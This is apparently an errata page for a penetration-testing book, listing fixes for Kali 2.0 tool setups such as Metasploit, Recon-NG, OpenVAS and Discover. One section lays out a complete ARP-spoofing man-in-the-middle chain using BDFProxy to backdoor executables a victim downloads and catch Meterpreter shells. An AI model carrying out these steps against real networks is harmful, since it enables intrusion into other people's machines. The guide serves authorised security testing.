05/02/2018
securepla.net
If you trying to access the old blog hosted on securepla.net, it’s now moved to blog.securepla.net. For example, if you are still looking for the Evade code, try: blog.securepla.net/download/evade.zip and http://blog.securepla.net/download/evade.txt (python source code).
Free Radius Update
Looks like the patch is no longer available (wget http://willhackforsushi.com/code/freeradius-wpe-2.1.12.patch)
New link:
wget https://raw.githubusercontent.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch
Also, If you get an error about: radiusd: error while loading shared libraries: libfreeradius-radius-2.1.12.so
Run: ldconfig
Kali Metasploit Logging
In the new version of Kali 2.0, I think the msfconsole.rc was moved from /root/.msf4/msfconsole.rc to /root/.msf5/msfconsole.rc. To configure Metasploit command logging, use the command: echo “spool /root/msf_console.log” > /root/.msf5/msfconsole.rc
Thanks Ronnie!
BackDoor Factory Proxy
It looks like the book was missing a configuration setting for the BackDoor Factory Proxy (BDFProxy). Make sure in the configuration to modify transparentProxy = transparent. Here’s what the full installing and implementation on a fresh Kali image will look like:
apt-get update
apt-get install bdfproxy
apt-get install mitmproxy
apt-get install python-openssl
apt-get install openssl
Modify the Config:
vi /etc/bdfproxy/bdfproxy.cfg
- Change all HOST IPs to your Kali IP
- Change transparentProxy = transparent
Start BDFProxy:
bdfproxy
Start the Meterpreter Resource File:
msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
Arp Stuff:
sysctl -w net.inet.ip_forwarding=1
iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 80 -j REDIRECT –to-port 8080
arpspoof -i eth0 -t victim-ip gateway-ip
arpspoof -i eth0 -t gateway-ip victim-ip
And you should be all set. Give it a try by downloading and executing a 32 bit version of Winrar (example: http://www.rarlab.com/rar/wrar521.exe) from your victim host. Watch the shells fall from the sky!
Thanks Joseph from Canada!
BackDoor Factory Installation
In the tools installation page, there is a directory folder missing for The Backdoor Factory. Replace:
cd the-backdoor-factory
with:
cd /opt/the-backdoor-factory
Thanks AJ and Kevin!
Metasploit Start – The Setup Phase
If you are using Kali 2.0, they have removed Metasploit Community/Pro from their image (https://www.kali.org/releases/kali-linux-20-released/). Therefore, they do not have a service called metasploit anymore.
In the book’s setup phase, there is a section about having to start and stop the metasploit service to build the db (service metasploit start). Instead of this command, just run: msfdb init. That will build the database.
Thanks Jack!
Discover Tool – Passive Scan
As Kali 2.0 broke some tools, I’ve been trying to find fixes for what I can. The Discover module had goofile broken with the update. To fix this issue in Kali 2.0, run the following commands:
wget “https://goofile.googlecode.com/files/goofilev1.5.zip”
unzip -p goofilev1.5.zip goofilev1.5/goofile.py > /usr/bin/goofile && chmod +x /usr/bin/goofile
Thanks Julien!
Also, I noticed Discover changed their installation script. In the PREGAME – THE SETUP.
OLD:
git clone https://github.com/leebaird/discover.git /opt/discover
cd /opt/discover && ./setup.sh
NEW:
git clone https://github.com/leebaird/discover.git /opt/discover
cd /opt/discover && ./update.sh
Recon-NG
Looks like Kali 2.0 broke Recon-NG. If you get the following error “Module ‘recon/domains-contacts/metacrawler’ disabled. Dependency required: ‘PyPDF2′” in Kali 2.0, run the following commands:
pip install PyPDF2
pip install olefile
Thanks Pamela!
GitRob
Tiny change configuring GitRob. When running the command: ./gitrob –configure, they now specify the database port. For postgres use port: 5432:
OpenVAS
Looks like a few small changes with Kali 2 on the Setup Phase.
Create Account (instead of openvas-adduser):
openvasmd –user=admin –new-password=admin
Login (instead of gsd):
Go to the browser to: https://127.0.0.1:9392
DSHashes
Looks like DSHashes might have been removed from ptscripts.googlecode.com svn.
Download the old archive from https://storage.googleapis.com/google-code-archive-source/v2/code.google.com/ptscripts/source-archive.zip and move dshashes.py to /opt/NTDSXtract/dshashes.py